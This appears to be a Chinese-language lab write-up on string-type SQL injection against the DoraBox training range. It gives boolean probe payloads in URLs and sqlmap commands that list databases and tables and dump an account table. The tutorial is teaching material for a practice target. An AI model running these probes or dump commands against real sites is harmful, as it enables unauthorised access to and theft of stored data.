【合天网安】DoraBox靶场之SQL字符型注入攻击

时间:2024-05-21 14:55:49

字符型:

当输入的参数x为字符型时,通常在.php中SQL语句类型大致如下:

select * from <表名> where id = ‘x’

这种类型我们同样可以使用and ‘1’=‘1和and ‘1’ = ‘2来判断。

  • Url 地址中输入 http://xxx/abc.php?id= x' and '1'='1 页面运行正常,继续进行下一步。
  • Url 地址中继续输入 http://xxx/abc.php?id= x' and '1'='2 页面运行错误,则说明此 Sql 注入为字符型注入。

 1、判断漏洞是否存在

【合天网安】DoraBox靶场之SQL字符型注入攻击

闭合单引号,成功执行插入的语句,可根据响应数据不同判断存在的字符型SQL注入

【合天网安】DoraBox靶场之SQL字符型注入攻击

2、利用sqlmap注入攻击进行漏洞利用

cd进入sqlmap所在文件夹

python sqlmap.py –u “url” –P 参数 --dbs

【合天网安】DoraBox靶场之SQL字符型注入攻击

【合天网安】DoraBox靶场之SQL字符型注入攻击

成功获取数据库pentest

 

3、通过sqlmap获取数据库pentest中的表

python sqlmap.py –u “url”-p 参数 –D 数据库名 –tables

【合天网安】DoraBox靶场之SQL字符型注入攻击

获取account表和news表

【合天网安】DoraBox靶场之SQL字符型注入攻击

 

4、account表就是包含我们需要信息的表,接下来获取表中的数据

python sqlmap.py -u “url”-p 参数 –D 数据库名 –T 表名 --dump

【合天网安】DoraBox靶场之SQL字符型注入攻击

得到的数据:

【合天网安】DoraBox靶场之SQL字符型注入攻击

 


(如有不足或者侵权的地方,请尽快联系我,我会及时修改或删除,非常感谢)

    我们要以高涨的信心和喷涌的力量去战斗。加油吧,少年,去追求更好的自己!